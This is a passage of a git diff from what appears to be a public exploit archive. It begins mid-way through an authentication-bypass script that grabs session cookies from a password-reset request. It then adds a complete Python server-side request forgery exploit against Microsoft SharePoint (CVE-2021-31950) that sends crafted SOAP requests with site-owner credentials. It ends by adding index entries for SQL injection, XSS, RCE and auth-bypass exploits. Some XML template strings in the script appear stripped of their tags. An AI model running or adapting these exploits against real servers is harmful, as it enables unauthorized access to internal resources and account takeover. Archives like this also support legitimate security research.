"id": "1_"+email_code} + reqtoken = requests.post(url+"requests.php?f=reset_password", headers=myheaders, data=resetdata) + print(reqtoken.headers['Set-Cookie']) + break \ No newline at end of file diff --git a/exploits/windows/webapps/49982.py b/exploits/windows/webapps/49982.py new file mode 100755 index 000000000..ecf973d5e --- /dev/null +++ b/exploits/windows/webapps/49982.py @@ -0,0 +1,132 @@ +# Exploit Title: Microsoft SharePoint Server 16.0.10372.20060 - 'GetXmlDataFromDataSource' Server-Side Request Forgery (SSRF) +# Date: 09 Jun 2021 +# Exploit Author: Alex Birnberg +# Software Link: https://www.microsoft.com/en-us/download/details.aspx?id=57462 +# Version: 16.0.10372.20060 +# Tested on: Windows Server 2019 +# CVE : CVE-2021-31950 + +#!/usr/bin/env python3 + +import html +import random +import string +import xml.sax.saxutils +import textwrap +import requests +import argparse +import xml.etree.ElementTree as ET +from requests_ntlm2 import HttpNtlmAuth +from urllib.parse import urlencode, urlparse + +class Exploit: + def __init__(self, args): + o = urlparse(args.url) + self.url = args.url + self.service = o.path + self.username = args.username + self.password = args.password + self.target = args.target + self.headers = args.header + self.method = args.request + self.data = args.data + self.content_type = args.content_type + self.s = requests.Session() + self.s.auth = HttpNtlmAuth(self.username, self.password) + self.s.headers = { + 'User-Agent': 'Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36' + } + self.s.proxies = { + 'http': 'http://127.0.0.1:8080' + } + + def trigger(self): + headers = '' + if self.headers: + for header in self.headers: + header = list(map(lambda x: x.strip(), header.split(':'))) + if len(header) != 2: + continue + headers += '{}'.format(header[0], header[1]) + method = '' + bypass_local = '' + if self.method and self.method.upper() == 'POST': + method = 'HTTP Post' + else: + method = 'HTTP Get' + bypass_local = '{0}'.format(''.join(random.choice(string.ascii_letters) for i in range(16))) + content_type = '' + if self.content_type and len(self.content_type): + content_type = '{}'.format(self.content_type) + data = '' + if self.data and len(self.data): + data = '{}'.format(html.escape(self.data).encode('ascii', 'xmlcharrefreplace').decode('utf-8')) + query_xml = textwrap.dedent('''\ + + + XMLURLDataAdapter + + + + + + + + + + + {} + {} + {} + {} + + + + + + '''.format(self.target, method, bypass_local, headers, data, content_type)) + query_xml = xml.sax.saxutils.escape(query_xml.replace('\r', '').replace('\n', '')) + data = textwrap.dedent('''\ + + + + + {} + + + '''.format(query_xml)) + r = self.soap('webpartpages', 'http://microsoft.com/sharepoint/webpartpages/GetXmlDataFromDataSource', data) + root = ET.fromstring(r.content) + try: + namespaces = { + 'soap': 'http://schemas.xmlsoap.org/soap/envelope/' + } + value = list(root.find('soap:Body', namespaces).iter())[2] + if value.tag == 'faultcode': + print('Error:', list(root.find('soap:Body', namespaces).iter())[3].text) + else: + print(value.text) + except: + print(r.content) + pass + + def soap(self, service, action, data): + headers = { + 'SOAPAction': '"{}"'.format(action), + 'Host': 'localhost', + 'Content-Type': 'text/xml; charset=utf-8', + } + return self.s.post('{}/_vti_bin/{}.asmx'.format(self.url, service), headers=headers, data=data) + +if __name__ == '__main__': + parser = argparse.ArgumentParser() + parser.add_argument('--url', help='Base URL', required=True, metavar='') + parser.add_argument('--username', help='Username of team site owner', required=True, metavar='') + parser.add_argument('--password', help='Password of team site owner', required=True, metavar='') + parser.add_argument('--target', help='Target URL to work with', required=True, metavar='') + parser.add_argument('-H', '--header', help='Pass custom header(s) to server', action='append', metavar='
') + parser.add_argument('-X', '--request', help='Specify request command to use', metavar='') + parser.add_argument('-d', '--data', help='HTTP POST data', metavar='') + parser.add_argument('-c', '--content-type', help='Value for the "Content-Type" header', metavar='') + exploit = Exploit(parser.parse_args()) + exploit.trigger() \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index d5152a42c..9660103c9 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -44084,6 +44084,7 @@ id,file,description,date,author,type,platform,port 49886,exploits/php/webapps/49886.txt,"COVID19 Testing Management System 1.0 - SQL Injection (Auth Bypass)",2021-05-19,"Rohit Burke",webapps,php, 49887,exploits/php/webapps/49887.txt,"COVID19 Testing Management System 1.0 - 'Admin name' Cross-Site Scripting (XSS)",2021-05-19,"Rohit Burke",webapps,php, 49891,exploits/multiple/webapps/49891.txt,"Spotweb 1.4.9 - DOM Based Cross-Site Scripting (XSS)",2021-05-21,nu11secur1ty,webapps,multiple, +49894,exploits/php/webapps/49894.sh,"WordPress Plugin WP Statistics 13.0.7 - Time-Based Blind SQL Injection (Unauthenticated)",2021-05-21,"Mansoor R",webapps,php, 49895,exploits/windows/webapps/49895.rb,"Microsoft Exchange 2019 - Unauthenticated Email Download (Metasploit)",2021-05-21,mekhalleh,webapps,windows, 49897,exploits/multiple/webapps/49897.txt,"Schlix CMS 2.2.6-6 - Arbitary File Upload And Directory Traversal Leads To RCE (Authenticated)",2021-05-24,"Emir Polat",webapps,multiple, 49901,exploits/java/webapps/49901.txt,"Shopizer 2.16.0 - 'Multiple' Cross-Site Scripting (XSS)",2021-05-24,"Marek Toth",webapps,java, @@ -44134,3 +44135,13 @@ id,file,description,date,author,type,platform,port 49973,exploits/php/webapps/49973.py,"GravCMS 1.10.7 - Arbitrary YAML Write/Update (Unauthenticated) (2)",2021-06-09,legend,webapps,php, 49974,exploits/php/webapps/49974.txt,"Student Result Management System 1.0 - 'class' SQL Injection",2021-06-10,"Riadh Benlamine",webapps,php, 49975,exploits/php/webapps/49975.txt,"TextPattern CMS 4.8.7 - Stored Cross-Site Scripting (XSS)",2021-06-10,"Mert Daş",webapps,php, +49980,exploits/multiple/webapps/49980.txt,"Accela Civic Platform 21.1 - 'servProvCode' Cross-Site-Scripting (XSS)",2021-06-11,"Abdulazeez Alaseeri",webapps,multiple, +49981,exploits/multiple/webapps/49981.txt,"Cerberus FTP Web Service 11 - 'svg' Stored Cross-Site Scripting (XSS)",2021-06-11,"Mohammad Hossein Kaviyany",webapps,multiple, +49982,exploits/windows/webapps/49982.py,"Microsoft SharePoint Server 16.0.10372.20060 - 'GetXmlDataFromDataSource' Server-Side Request Forgery (SSRF)",2021-06-11,"Alex Birnberg",webapps,windows, +49983,exploits/php/webapps/49983.py,"OpenEMR 5.0.0 - Remote Code Execution (Authenticated)",2021-06-11,"Ron Jost",webapps,php, +49984,exploits/php/webapps/49984.html,"WordPress Plugin Database Backups 1.2.2.6 - 'Database Backup Download' CSRF",2021-06-11,0xB9,webapps,php, +49985,exploits/multiple/webapps/49985.txt,"Grocery crud 1.6.4 - 'order_by' SQL Injection",2021-06-11,TonyShavez,webapps,multiple, +49986,exploits/multiple/webapps/49986.txt,"Solar-Log 500 2.8.2 - Incorrect Access Control",2021-06-11,Luca.Chiou,webapps,multiple, +49987,exploits/multiple/webapps/49987.txt,"Solar-Log 500 2.8.2 - Unprotected Storage of Credentials",2021-06-11,Luca.Chiou,webapps,multiple, +49988,exploits/php/webapps/49988.txt,"Zenario CMS 8.8.52729 - 'cID' Blind & Error based SQL injection (Authenticated)",2021-06-11,"Avinash R",webapps,php, +49989,exploits/php/webapps/49989.py,"WoWonder Social Network Platform 3.1 - Authentication Bypass",2021-06-11,securityforeveryone.com,webapps,php,